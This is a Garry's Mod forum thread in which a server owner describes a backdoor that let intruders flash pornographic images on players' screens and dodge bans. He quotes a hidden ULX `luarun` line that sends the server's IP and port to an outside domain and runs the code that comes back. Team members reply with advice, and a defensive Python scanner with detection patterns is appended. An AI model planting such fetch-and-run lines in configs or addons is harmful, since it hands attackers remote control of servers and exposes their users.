Author Topic: Server Hackers (Graphic Sexual Content Flashing on Players' Screens, Ban Evasion)  (Read 2672 times)


Offline Super

  • Newbie
Server hackers??? Oh great, just another clickbaity thread about a 12 year old kid complaining about scripters.

Well, not exactly.
This is a story time, so get settled in.

A little bit about me; I'm currently an independent developer/owner of a Garry's Mod DarkRP server with moderate coding knowledge, really enough to get me by. Been working on this server for the past month, and this is the first time (and hopefully last time) this happens to me.

It's just an average day on the server, everything's quiet, but then we receive an unexpected spike in players. Mostly minges because of being a new server, but nonetheless, still players. This seemed quite promising because it had been empty the past week. Everyone's just doing their own things, and I feel like it's break time since I had been working non-stop for a couple of hours, so I get up to go eat some food. I'm standing there in my kitchen, enjoying my food, when my friend who was playing on my server turns to me with a worried look on his face and says "We're getting hacked."

Oh , what?! No way, this can't happen. I had a feeling...

Thoughts started racing through my head, and so I finished up quickly and went to my computer. There on my screen is an image of graphic pornographic material flashing on my screen. Everyone was complaining about it on the server, so I was quite concerned. My Garry's Mod runs in fullscreen, so it definitely couldn't be another application causing this. I've heard about this one other time and I thought it wasn't real. Oh boy was I wrong! Since the pornographic image was flashing constantly, I decide it's investigation time.

While on the server, I search through my console, the server's chat history, and all the players to find the troublesome players. Turns out, a few individuals were involved. I found who I thought to be the main troublemaker, named "in0xia" along with a possibly malicious URL, mostly because my friend had ULX banned him multiple times but he never actually got kicked, so I decided to start taking action. I went straight to an addon that allows me to grab users' IP addresses, and ULX IPBanned (through a ULX addon) the player, and he finally disconnected. I also attempted banning a player called 'b a n k s y' but even when the server echoed that he was ULX banned, he was still right in front of my face. in0xia was instantly able to rejoin the server, so since the ban wasn't working, I started crashing both of their clients every time they attempted to join the server. Before any more destruction could be caused, I pulled the plug on the server.

I frantically started searching through all my files looking for possible backdoors, and one of the first file paths I searched through was ULX. I found not a backdoor, not a command, but ~35,000 lines of code! Under data/ulx/config.txt, I found some code that forced ULX to include a function that fetches the server's IP address, hostport, and name and sends it off to a server.

Code:
ulx luarun "function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end"

There was also code before and after the above code that disabled ulx logecho before the function was executed and re-enabled ulx logecho after the function was finished.

I went to the website inside the http.Fetch and it returns with 'This is for servers only...'
Code:
https://xn--vxao.pw/tracker.php?port=

No luck.

So I decided to head to just the domain itself, and it linked to:
Code:
https://xn--vxao.pw/

JACKPOT!!

That website included multiple pieces of contact information, including their Twitter, Discord, and Steam! I decided to head straight to the Steam profile, and what do I know, it's one of the players causing the trouble on my server!

I still haven't pinpointed where it makes the pornographic images flash on the screen, but I figured letting you all know that this isn't an 'urban legend of gmod' or whatever would be useful. I'd highly advise that you ban their SteamIDs before they even get on your server, because then you too might have porn spammed on all your users' screens and possibly have worse happen to you.



Offline JamminR

  • Ulysses Team Member
  • Hero Member
  • Sertafide Ulysses Jenius
    • Team Ulysses [ULib/ULX, other fine releases]
You likely used a Steam Workshop addon that had a back door.
See https://facepunch.com/showthread.php?t=1551921
Though ULX makes it easy for humans to admin, allowing random code to run on your server makes it just as easy for those who write back doors to use ULX commands too as console/root.

Older post - with video link of similar screen control.
https://facepunch.com/showthread.php?t=1521418

Anyway, though it's ULX commands being run, it's not ULX's fault - some server owners such as yourself are trusting Steam Workshop code that shouldn't be.
(or worse, and deserved, running exploited releases from ScriptFodder that were leaks)
« Last Edit: February 20, 2017, 08:55:17 PM by JamminR »
"Though a program be but three lines long, someday it will have to be maintained." -- The Tao of Programming

Offline Stickly Man!

  • Ulysses Team Member
  • Hero Member
  • What even IS software anymore?
    • XGUI
We are planning on addressing the issue where config.txt can be used to store/execute arbitrary commands and code. This will close one method of persistence of such attacks; however, it will not completely prevent them.

As a side note, you really should be careful with workshop addons. A large dump was recently made with a bunch of addons that had suspicious code, most of which have been updated or taken down: https://facepunch.com/showthread.php?t=1552592
Join our Team Ulysses community discord! https://discord.gg/gR4Uye6
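
Added example, not part of the thread and not ULX or Team Ulysses code: a small offline check a server owner could run over data/ulx/config.txt to flag the indicators described in the first post (a `ulx luarun` line, `http.Fetch`, `RunString`, and code executed while `ulx logecho` is switched off). The function and rule names are hypothetical, and the sample config is constructed with a placeholder domain and assumed logecho values.

```python
import re

# Per-line indicators, taken from the backdoor line quoted in the first post.
LINE_RULES = {
    "luarun": re.compile(r"\bulx\s+luarun\b", re.I),
    "http_fetch": re.compile(r"\bhttp\.Fetch\s*\(", re.I),
    "run_string": re.compile(r"\bRunString\s*\(", re.I),
}
LOGECHO = re.compile(r"^\s*ulx\s+logecho\s+(\d+)", re.I)


def scan_config(text):
    """Return (line_no, sorted rule names) for each suspicious config line."""
    findings = []
    echo_off_since = None  # line number where log echo was last set to 0
    for no, line in enumerate(text.splitlines(), 1):
        m = LOGECHO.match(line)
        if m:
            # A logecho setting on its own is normal; only track its state.
            echo_off_since = no if int(m.group(1)) == 0 else None
            continue
        hits = {name for name, rx in LINE_RULES.items() if rx.search(line)}
        # Code run while echo is off matches the hiding trick from the post.
        if hits and echo_off_since is not None:
            hits.add("echo_suppressed")
        if hits:
            findings.append((no, sorted(hits)))
    return findings


# Constructed sample, not the real file: placeholder domain, assumed values.
SAMPLE = """\
ulx showmotd 1
ulx logecho 0
ulx luarun "function a() http.Fetch('https://example.invalid/t.php', function(b) RunString(b, 'x') end) end"
ulx logecho 1
ulx chattime 3
"""

if __name__ == "__main__":
    for no, rules in scan_config(SAMPLE):
        print(f"line {no}: {', '.join(rules)}")
```

A hit only tells you where to look; the addon that wrote the lines into config.txt still has to be found and removed, or they will come back.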